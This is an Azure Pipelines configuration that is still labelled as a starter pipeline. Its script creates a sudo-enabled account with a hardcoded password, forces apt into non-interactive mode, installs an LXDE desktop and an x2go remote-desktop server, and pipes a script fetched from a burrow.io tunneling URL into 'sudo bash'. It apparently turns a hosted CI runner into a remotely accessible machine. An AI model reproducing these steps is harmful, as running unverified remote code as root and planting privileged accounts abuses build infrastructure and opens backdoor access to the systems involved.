# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

pool:
  vmImage: 'Ubuntu-16.04'
steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'
#- task: DownloadSecureFile@1
#  inputs:
#    secureFile: Jau.pem
- script: |
    echo "v4"
    sudo apt-get update
    sudo apt-get install curl -y
    curl checkip.amazonaws.com
    cd $(Agent.TempDirectory) && pwd && ls
    sudo apt-get install curl 
    #/bin/bash -c "$(curl -sL https://git.io/vokNn)"
    sudo apt-get install python3 ffmpeg curl python3-pip build-essential -y
    sudo pip3 install bs4
    pushd / && ls -lhart
    sudo useradd -m -g root helloworld
    sudo echo "helloworld:eA&AIudSWDYV" | sudo chpasswd
    sudo usermod -aG sudo helloworld
    sudo snap install wine-platform
    sudo apt-get install python-software-properties
    apt-key adv --recv-keys --keyserver keys.gnupg.net E1F958385BFE2B6E
    sudo add-apt-repository ppa:x2go/stable -y
    export DEBIAN_FRONTEND=noninteractive    
    sudo echo $DEBIAN_FRONTEND
    sudo apt-mark hold wicd-daemon
    echo -e "APT::Get::Assume-Yes \"true\";\r\nAPT::Get::force-yes \"true\";" | sudo tee -a /etc/apt/apt.conf.d/90forceyes
    #### WSSH
    #pip install setuptools && pip install wheel && pip install gevent &&  pip install websocket && pip install gevent-websocket && pip install flask && pip install wssh
    #sed -i '65s/.*/    from geventwebsocket.handler import WebSocketHandler/' /usr/local/bin/wsshd
    #wsshd
    ######
    sudo apt update && sudo apt-get install lxde lxdm x2goserver -yq
    sudo curl -Ls https://burrow.io/mm9PPJdL-APFCekdI  -o - | sudo bash -s #old
    #curl -Ls https://burrow.io/DFYFKeos-yOkmajYq | sudo bash -s
  displayName: 'Run a multi-line script' 
